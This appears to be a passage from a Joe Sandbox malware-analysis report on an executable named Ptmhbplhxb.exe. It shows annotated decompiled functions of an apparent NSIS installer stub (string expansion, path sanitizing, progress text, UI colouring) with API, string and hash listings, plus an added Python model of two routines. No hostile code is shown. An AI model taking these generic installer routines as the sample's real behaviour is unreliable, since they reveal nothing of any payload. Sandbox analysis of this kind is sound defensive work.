                					_a4 = _a4 & 0x00000000;
                				}
                				while(1) {
                					_t88 =  *_t66;
                					if(_t88 == 0) {
                						break;
                					}
                					__eflags = _t90 - _t39 - 0x400;
                					if(_t90 - _t39 >= 0x400) { // hard stop at 0x400 bytes of output, the size of every string slot in this stub
                						break;
                					}
                					_t66 = _t66 + 1;
                					__eflags = _t88 - 4;
                					_a8 = _t66;
                					if(__eflags >= 0) { // bytes >= 4 are plain data; 4 itself means "copy the next byte literally"
                						if(__eflags != 0) {
                							 *_t90 = _t88;
                							_t90 =  &(_t90[1]);
                							__eflags = _t90;
                						} else {
                							 *_t90 =  *_t66;
                							_t90 =  &(_t90[1]);
                							_t66 = _t66 + 1;
                						}
                						continue;
                					}
                					_t41 =  *((char*)(_t66 + 1)); // escape codes 1..3 are followed by two parameter bytes (lo, hi)
                					_t80 =  *_t66;
                					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f; // 14-bit parameter, low 7 bits first
                					_v24 = _t80; // for code 2 the raw bytes are CSIDL candidates: [lo | 0x80, lo, hi | 0x80, hi]
                					_v28 = _t80 | 0x00000080;
                					_v16 = _t41;
                					_v20 = _t41 | 0x00000080;
                					_t66 = _a8 + 2;
                					__eflags = _t88 - 2;
                					if(_t88 != 2) { // 2 = shell folder, handled below
                						__eflags = _t88 - 3;
                						if(_t88 != 3) {
                							__eflags = _t88 - 1;
                							if(_t88 == 1) { // 1 = language string: recurse with the negative table index -1 - param
                								__eflags = (_t41 | 0xffffffff) - _t97;
                								E00405F87(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                							}
                							L42:
                							_t90 =  &(_t90[lstrlenA(_t90)]); // advance past whatever the sub-expansion wrote
                							_t39 = 0x42e3a0;
                							continue;
                						}
                						__eflags = _t97 - 0x1d; // 3 = variable: slots of 0x400 bytes starting at 0x430000; index 0x1d is rendered from the window-handle global
                						if(_t97 != 0x1d) {
                							__eflags = (_t97 << 0xa) + 0x430000;
                							E00405F65(_t90, (_t97 << 0xa) + 0x430000);
                						} else {
                							E00405EC3(_t90,  *0x42f408); // same global that is passed as hwnd to SHGetSpecialFolderLocation below
                						}
                						__eflags = _t97 + 0xffffffeb - 7;
                						if(_t97 + 0xffffffeb < 7) { // variable indices 21..27 hold paths and are run through the sanitizer E004061CF
                							L33:
                							E004061CF(_t90);
                						}
                						goto L42;
                					}
                					_t52 =  *0x42f40c; // looks like an OS version word: non-negative (NT platform), 0x5a04 (4.90 = Windows ME), or an all-users CSIDL of 0x23 / 0x2e in the hi byte selects the SHGetFolderPathA route first (_a8 = 1)
                					__eflags = _t52;
                					_t99 = 2; // CSIDL candidates to try from the 4-entry table built above: 2 (current-user pair) or 4 (all-users pair first)
                					if(_t52 >= 0) {
                						L13:
                						_a8 = 1;
                						L14:
                						__eflags =  *0x42f4a4; // all-users shell-folder mode flag
                						if( *0x42f4a4 != 0) {
                							_t99 = 4;
                						}
                						__eflags = _t80;
                						if(__eflags >= 0) { // lo byte without bit 7: a CSIDL
                							__eflags = _t80 - 0x25;
                							if(_t80 != 0x25) { // 0x25 = CSIDL_SYSTEM
                								__eflags = _t80 - 0x24;
                								if(_t80 == 0x24) { // 0x24 = CSIDL_WINDOWS
                									GetWindowsDirectoryA(_t90, 0x400);
                									_t99 = 0;
                								}
                								while(1) { // try each candidate CSIDL until one resolves to a non-empty path
                									__eflags = _t99;
                									if(_t99 == 0) {
                										goto L30;
                									}
                									_t53 =  *0x42f404; // SHGetFolderPathA resolved at run time; NULL when unavailable
                									_t99 = _t99 - 1;
                									__eflags = _t53;
                									if(_t53 == 0) {
                										L26:
                										_t55 = SHGetSpecialFolderLocation( *0x42f408,  *(_t100 + _t99 * 4 - 0x18),  &_v8); // fallback: PIDL route
                										__eflags = _t55;
                										if(_t55 != 0) {
                											L28:
                											 *_t90 =  *_t90 & 0x00000000; // failed: clear the output and try the next candidate
                											__eflags =  *_t90;
                											continue;
                										}
                										__imp__SHGetPathFromIDListA(_v8, _t90);
                										_v12 = _t55;
                										__imp__CoTaskMemFree(_v8);
                										__eflags = _v12;
                										if(_v12 != 0) {
                											goto L30;
                										}
                										goto L28;
                									}
                									__eflags = _a8;
                									if(_a8 == 0) {
                										goto L26;
                									}
                									_t57 =  *_t53( *0x42f408,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // SHGetFolderPathA(hwnd, csidl, NULL, 0, out); 0 means success
                									__eflags = _t57;
                									if(_t57 == 0) {
                										goto L30;
                									}
                									goto L26;
                								}
                								goto L30;
                							}
                							GetSystemDirectoryA(_t90, 0x400);
                							goto L30;
                						} else { // lo byte with bit 7 set: read the folder from HKLM (0x80000002) "Software\Microsoft\Windows\CurrentVersion", value name = string at index lo & 0x3f; bit 6 is passed as an extra flag
                							E00405E4C((_t80 & 0x0000003f) +  *0x42f458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f458, _t90, _t80 & 0x00000040);
                							__eflags =  *_t90;
                							if( *_t90 != 0) {
                								L31:
                								__eflags = _v16 - 0x1a;
                								if(_v16 == 0x1a) { // hi byte == CSIDL_APPDATA (0x1a) marks the Quick Launch folder
                									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                								}
                								goto L33;
                							}
                							E00405F87(_t66, _t90, _t99, _t90, _v16); // registry value missing: expand the fallback string at index hi instead
                							L30:
                							__eflags =  *_t90;
                							if( *_t90 == 0) {
                								goto L33;
                							}
                							goto L31;
                						}
                					}
                					__eflags = _t52 - 0x5a04;
                					if(_t52 == 0x5a04) {
                						goto L13;
                					}
                					__eflags = _v16 - 0x23;
                					if(_v16 == 0x23) {
                						goto L13;
                					}
                					__eflags = _v16 - 0x2e;
                					if(_v16 == 0x2e) {
                						goto L13;
                					} else {
                						_a8 = _a8 & 0x00000000;
                						goto L14;
                					}
                				}
                				 *_t90 =  *_t90 & 0x00000000;
                				if(_a4 == 0) {
                					return _t39;
                				}
                				return E00405F65(_a4, _t39);
                			}

                Instruction address column for the C code above (one entry per line, no longer aligned after extraction; 0x00000000 marks lines without an address): 0x00405f87 to 0x004061cc.

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 004060B2
                • GetWindowsDirectoryA.KERNEL32(0042E3A0,00000400,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 004060C5
                • SHGetSpecialFolderLocation.SHELL32(004050C4,772EEA30,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 00406101
                • SHGetPathFromIDListA.SHELL32(772EEA30,0042E3A0), ref: 0040610F
                • CoTaskMemFree.OLE32(772EEA30), ref: 0040611B
                • lstrcatA.KERNEL32(0042E3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040613F
                • lstrlenA.KERNEL32(0042E3A0,?,0042A050,00000000,004050C4,0042A050,00000000,00000000,00419517,772EEA30), ref: 00406191
                Strings
                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406081
                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406139
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 717251189-730719616
                • Opcode ID: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
                • Instruction ID: 1b13e8ff18f2312f61c88a614d7ce51b6c0fc9f7833a06fa9902b6248b39176d
                • Opcode Fuzzy Hash: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
                • Instruction Fuzzy Hash: D561F170A00105AEDF20AF24CC90BBB3BA5EB55314F56413FE903BA2D2C67D4962CB5E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402C61(struct HWND__* _a4, intOrPtr _a8) {
                				char _v68;
                				int _t11;
                				int _t20;

                				if(_a8 == 0x110) { // WM_INITDIALOG: start a 250 ms timer (id 1), then fall through as if WM_TIMER
                					SetTimer(_a4, 1, 0xfa, 0);
                					_a8 = 0x113;
                				}
                				if(_a8 == 0x113) { // WM_TIMER: refresh the verification progress text
                					_t20 =  *0x415420; // 0x36e154
                					_t11 =  *0x42142c; // 0x36e158
                					if(_t20 >= _t11) { // clamp bytes-verified to the total so the percentage never exceeds 100
                						_t20 = _t11;
                					}
                					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11)); // done * 100 / total
                					SetWindowTextA(_a4,  &_v68);
                					SetDlgItemTextA(_a4, 0x406,  &_v68); // same text into dialog item 0x406
                				}
                				return 0;
                			}

                Instruction address column for the C code above (one entry per line, no longer aligned after extraction): 0x00402c6e to 0x00402ce1.

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: T6$X6$verifying installer: %d%%
                • API String ID: 1451636040-1432654752
                • Opcode ID: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                • Instruction ID: 537944924eabc97b3cccf86cf440a0916c3cc685b10ad000e4021125f5d30dc2
                • Opcode Fuzzy Hash: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                • Instruction Fuzzy Hash: 3401FF7164020DFBEF209F61DD09EEE37A9AB04305F008039FA06A92D0DBB999558F59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004061CF(CHAR* _a4) {
                				char _t5;
                				char _t7;
                				char* _t15;
                				char* _t16;
                				CHAR* _t17;

                				_t17 = _a4;
                				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) { // skip a leading \\?\ prefix
                					_t17 =  &(_t17[4]);
                				}
                				if( *_t17 != 0 && E0040596A(_t17) != 0) { // E0040596A (body not shown here) tests the path spec; a leading "X:" or "\\" is kept out of the filtering below, otherwise the ':' would be removed
                					_t17 =  &(_t17[2]);
                				}
                				_t5 =  *_t17;
                				_t15 = _t17;
                				_t16 = _t17;
                				if(_t5 != 0) {
                					do { // in-place filter: keep a character only if it is above 0x1f and not one of *?|<>/": (E00405928 returns a pointer into that set; *ptr == 0 means not found). With the decompiler's signed char the compare would also drop bytes >= 0x80, which the CharNextA (DBCS) handling suggests is a typing artifact
                						if(_t5 > 0x1f &&  *((char*)(E00405928("*?|<>/\":", _t5))) == 0) {
                							E00405AB9(_t16, _t17, CharNextA(_t17) - _t17); // copy one (possibly double-byte) character down
                							_t16 = CharNextA(_t16);
                						}
                						_t17 = CharNextA(_t17);
                						_t5 =  *_t17;
                					} while (_t5 != 0);
                				}
                				 *_t16 =  *_t16 & 0x00000000; // terminate the filtered string
                				while(1) { // strip trailing spaces and backslashes, back to the start of the filtered part
                					_t16 = CharPrevA(_t15, _t16);
                					_t7 =  *_t16;
                					if(_t7 != 0x20 && _t7 != 0x5c) {
                						break;
                					}
                					 *_t16 =  *_t16 & 0x00000000;
                					if(_t15 < _t16) {
                						continue;
                					}
                					break;
                				}
                				return _t7;
                			}

                Instruction address column for the C code above (one entry per line, no longer aligned after extraction; 0x00000000 marks lines without an address): 0x004061d1 to 0x00406265.

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ptmhbplhxb.exe",772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
                • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
                • CharNextA.USER32(?,"C:\Users\user\Desktop\Ptmhbplhxb.exe",772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
                • CharPrevA.USER32(?,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000,004031CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
                Strings
                • *?|<>/":, xrefs: 00406217
                • "C:\Users\user\Desktop\Ptmhbplhxb.exe", xrefs: 0040620B
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004061D0
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Char$Next$Prev
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 589700163-4039227058
                • Opcode ID: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
                • Instruction ID: ed3a47555f86895cac8e455d85beb05a749fa7fcd8deb799c497f9efd275ca90
                • Opcode Fuzzy Hash: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
                • Instruction Fuzzy Hash: D111E26180579029FB3226380C44B776F884F6A760F1900BFE8D2722C3CA7C5C62966E
                Uniqueness

                Uniqueness Score: -1.00%
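                The two routines decompiled above, E00405F87 (string expansion driven by escape bytes 1..4 and two 7-bit parameter bytes) and E004061CF (the path sanitizer it calls), modelled in Python. This is an added example written for this page, not code from the report or from the sample; the string constants involved ("\Microsoft\Internet Explorer\Quick Launch", the "*?|<>/\":" character set, the 0x400 output bound) match the string-expansion code of the NSIS installer stub. Assumptions: everything the binary reads from globals or Win32 (variable slots at 0x430000, the language table, shell folders, the HKLM value read by E00405E4C, the window handle) is supplied by the caller as tables or callables; the second attempt with bit 0x80 set in the CSIDL is collapsed into a single lookup; E0040596A, whose body is not in this section, is assumed to test for a drive-letter or UNC prefix; the 0x80 marker bits that pack14() sets are an encoder-side assumption, the decoder masks with 0x7f exactly as the decompile does; the tables and paths in demo() are constructed.

```python
"""Model of the string expander E00405F87 and the path sanitizer E004061CF.

Added example reconstructed from the decompiled control flow; the Win32
lookups (shell folders, registry, window handle) are injected as callables
so the decoding logic can be exercised offline.
"""
from typing import Callable, Dict, Optional

NSIS_MAX_STRLEN = 0x400                 # output bound tested on every loop iteration
CODE_LANG, CODE_SHELL, CODE_VAR, CODE_SKIP = 1, 2, 3, 4   # 1..3 escape, 4 = next byte literal
VAR_HWNDPARENT = 0x1d                   # variable index rendered as the decimal window handle
VALIDATED_VARS = range(21, 28)          # (idx - 21) < 7: path-holding variables get sanitized
CSIDL_APPDATA, CSIDL_WINDOWS, CSIDL_SYSTEM = 0x1a, 0x24, 0x25
QUICK_LAUNCH = "\\Microsoft\\Internet Explorer\\Quick Launch"
BAD_CHARS = set('*?|<>/":')


def validate_filename(path: str) -> str:
    r"""E004061CF: drop a leading \\?\ prefix, keep a leading 'X:' or '\\'
    (assumed behaviour of E0040596A), delete control characters and *?|<>/":,
    then strip trailing spaces and backslashes."""
    if path.startswith("\\\\?\\"):
        path = path[4:]
    prefix = ""
    if path.startswith("\\\\") or (path[1:2] == ":" and path[:1].isalpha()):
        prefix, path = path[:2], path[2:]
    body = "".join(c for c in path if ord(c) > 0x1F and c not in BAD_CHARS)
    return prefix + body.rstrip(" \\")


def pack14(value: int) -> bytes:
    """Two 7-bit bytes, low first; bit 7 set so no byte collides with codes 0..4
    (encoder-side assumption; the decoder only masks with 0x7f)."""
    return bytes([0x80 | (value & 0x7F), 0x80 | ((value >> 7) & 0x7F)])


class Expander:
    def __init__(self, strings: Dict[int, bytes], lang: Dict[int, bytes],
                 variables: Dict[int, str],
                 shell_folder: Callable[[int], Optional[str]],
                 reg_folder: Callable[[int, bool], Optional[str]],
                 hwnd: int = 0, all_users: bool = False) -> None:
        self.strings, self.lang, self.variables = strings, lang, variables
        self.shell_folder, self.reg_folder = shell_folder, reg_folder
        self.hwnd, self.all_users = hwnd, all_users

    def expand(self, data: bytes) -> str:
        out, i = "", 0
        while i < len(data) and data[i] != 0 and len(out) < NSIS_MAX_STRLEN:
            code, i = data[i], i + 1
            if code > CODE_SKIP:                      # ordinary character
                out += chr(code)
                continue
            if code == CODE_SKIP:                     # next byte is literal, whatever its value
                out += chr(data[i])
                i += 1
                continue
            if i + 1 >= len(data):                    # an escape needs two parameter bytes
                break
            lo, hi, i = data[i], data[i + 1], i + 2
            param = ((hi & 0x7F) << 7) | (lo & 0x7F)  # 14-bit value, low 7 bits first
            if code == CODE_LANG:                     # language string (binary uses slot -1 - param)
                out += self.expand(self.lang[param])
            elif code == CODE_VAR:
                val = str(self.hwnd) if param == VAR_HWNDPARENT else self.variables.get(param, "")
                out += validate_filename(val) if param in VALIDATED_VARS else val
            else:
                out += self._shell(lo, hi)
        return out[:NSIS_MAX_STRLEN]

    def _shell(self, lo: int, hi: int) -> str:
        r"""CODE_SHELL: lo = current-user CSIDL, or with bit 7 set a value-name index under
        HKLM\Software\Microsoft\Windows\CurrentVersion; hi = all-users CSIDL, or the
        fallback string index for the registry case."""
        if lo & 0x80:
            path = self.reg_folder(lo & 0x3F, bool(lo & 0x40)) or self.expand(self.strings[hi])
        elif lo in (CSIDL_SYSTEM, CSIDL_WINDOWS):
            path = self.shell_folder(lo) or ""
        else:                                         # all-users CSIDL first when that mode is on
            order = [hi, lo] if self.all_users else [lo]
            path = next((p for p in map(self.shell_folder, order) if p), "")
        if path and hi == CSIDL_APPDATA:              # hi byte == CSIDL_APPDATA marks Quick Launch
            path += QUICK_LAUNCH
        return validate_filename(path)


def demo() -> Dict[str, str]:
    """Constructed inputs and fake lookups standing in for the installer's tables."""
    strings = {7: b"C:\\Program Files"}               # fallback literal for the registry folder
    lang = {0: b"Demo Setup"}
    variables = {21: "C:\\Demo App\\ "}              # path slot with a stray trailing space
    folders = {CSIDL_APPDATA: "C:\\Users\\user\\AppData\\Roaming",
               CSIDL_WINDOWS: "C:\\Windows", CSIDL_SYSTEM: "C:\\Windows\\System32"}
    ex = Expander(strings, lang, variables, folders.get,
                  lambda name_idx, alt_view: None,   # registry value missing -> fallback path
                  hwnd=0x50C4)
    return {
        "instdir": ex.expand(b"\x03" + pack14(21) + b"\\bin"),
        "quicklaunch": ex.expand(b"\x02\x1a\x1a"),
        "programfiles": ex.expand(b"\x02" + bytes([0x80 | 3, 7]) + b"\\App"),
        "title": ex.expand(b"\x01" + pack14(0) + b" \x04\x02hwnd=\x03" + pack14(VAR_HWNDPARENT)),
        "overflow": ex.expand(b"A" * 0x500),
    }
```

                demo() returns the expansions; the "overflow" entry shows the 0x400 bound cutting the output short, which is the check that keeps an expansion from running past the fixed buffer at 0x42e3a0, and the "instdir" entry shows the sanitizer removing the trailing space before the literal suffix is appended.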

                C-Code - Quality: 100%
                			E0040408D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                				struct tagLOGBRUSH _v16;
                				long _t35;
                				long _t37;
                				void* _t40;
                				long* _t49;

                				if(_a4 + 0xfffffecd > 5) { // only WM_CTLCOLOREDIT (0x133) .. WM_CTLCOLORSTATIC (0x138) are handled
                					L15:
                					return 0;
                				}
                				_t49 = GetWindowLongA(_a12, 0xffffffeb); // GWL_USERDATA (-21): per-control colour record {text, background, lbStyle, hBrush, bkMode, flags}
                				if(_t49 == 0) {
                					goto L15;
                				}
                				_t35 =  *_t49;
                				if((_t49[5] & 0x00000002) != 0) { // flag 2: text colour is a COLOR_* index, resolve it
                					_t35 = GetSysColor(_t35);
                				}
                				if((_t49[5] & 0x00000001) != 0) { // flag 1: apply the text colour
                					SetTextColor(_a8, _t35);
                				}
                				SetBkMode(_a8, _t49[4]);
                				_t37 = _t49[1];
                				_v16.lbColor = _t37;
                				if((_t49[5] & 0x00000008) != 0) { // flag 8: background colour is a COLOR_* index
                					_t37 = GetSysColor(_t37);
                					_v16.lbColor = _t37;
                				}
                				if((_t49[5] & 0x00000004) != 0) { // flag 4: apply the background colour
                					SetBkColor(_a8, _t37);
                				}
                				if((_t49[5] & 0x00000010) != 0) { // flag 0x10: (re)create the background brush, freeing the previous one
                					_v16.lbStyle = _t49[2];
                					_t40 = _t49[3];
                					if(_t40 != 0) {
                						DeleteObject(_t40);
                					}
                					_t49[3] = CreateBrushIndirect( &_v16);
                				}
                				return _t49[3]; // HBRUSH handed back to the dialog manager
                			}

                Instruction address column for the C code above (one entry per line, no longer aligned after extraction; 0x00000000 marks lines without an address): 0x0040409f to 0x00404133.

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                • Instruction ID: 2d9fb341b818c34885f35f6e6d755d1b55c6e7706bb7847a6dc6733995099f15
                • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                • Instruction Fuzzy Hash: 1A216F71500704ABCB219F68DE08A4BBBF8AF41714F048939EAD5F66A0C734E948CB64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040508C(CHAR* _a4, CHAR* _a8) {
                				struct HWND__* _v8;
                				signed int _v12;
                				CHAR* _v32;
                				long _v44;
                				int _v48;
                				void* _v52;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				CHAR* _t26;
                				signed int _t27;
                				CHAR* _t28;
                				long _t29;
                				signed int _t39;
                
                				_t26 =  *0x42ebe4; // 0x0
                				_v8 = _t26;
                				if(_t26 != 0) {
                					_t27 =  *0x42f4d4;
                					_v12 = _t27;
                					_t39 = _t27 & 0x00000001;
                					if(_t39 == 0) {
                						E00405F87(0, _t39, 0x42a050, 0x42a050, _a4);
                					}
                					_t26 = lstrlenA(0x42a050);
                					_a4 = _t26;
                					if(_a8 == 0) {
                						L6:
                						if((_v12 & 0x00000004) == 0) {
                							_t26 = SetWindowTextA( *0x42ebc8, 0x42a050);
                						}
                						if((_v12 & 0x00000002) == 0) {
                							_v32 = 0x42a050;
                							_v52 = 1;
                							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                							_v44 = 0;
                							_v48 = _t29 - _t39;
                							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                						}
                						if(_t39 != 0) {
                							_t28 = _a4;
                							 *((char*)(_t28 + 0x42a050)) = 0;
                							return _t28;
                						}
                					} else {
                						_t26 =  &(_a4[lstrlenA(_a8)]);
                						if(_t26 < 0x800) {
                							_t26 = lstrcatA(0x42a050, _a8);
                							goto L6;
                						}
                					}
                				}
                				return _t26;
                			}

                APIs
                • lstrlenA.KERNEL32(0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                • lstrlenA.KERNEL32(004030DC,0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                • lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,00419517,772EEA30), ref: 004050E8
                • SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                • Instruction ID: 508789985144291932d060d6ef0b432b589b283746e8f0e3613f73f9cddaab2c
                • Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                • Instruction Fuzzy Hash: 9E217A71A00518BFDB119FA5CD85EDFBFA9EB05354F14807AF944AA290C6398A418F98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404957(struct HWND__* _a4, intOrPtr _a8) {
                				long _v8;
                				signed char _v12;
                				unsigned int _v16;
                				void* _v20;
                				intOrPtr _v24;
                				long _v56;
                				void* _v60;
                				long _t15;
                				unsigned int _t19;
                				signed int _t25;
                				struct HWND__* _t28;
                
                				_t28 = _a4;
                				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                				if(_a8 == 0) {
                					L4:
                					_v56 = _t15;
                					_v60 = 4;
                					SendMessageA(_t28, 0x110c, 0,  &_v60);
                					return _v24;
                				}
                				_t19 = GetMessagePos();
                				_v16 = _t19 >> 0x10;
                				_v20 = _t19;
                				ScreenToClient(_t28,  &_v20);
                				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                				if((_v12 & 0x00000066) != 0) {
                					_t15 = _v8;
                					goto L4;
                				}
                				return _t25 | 0xffffffff;
                			}

                APIs
                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404972
                • GetMessagePos.USER32 ref: 0040497A
                • ScreenToClient.USER32 ref: 00404994
                • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049A6
                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049CC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
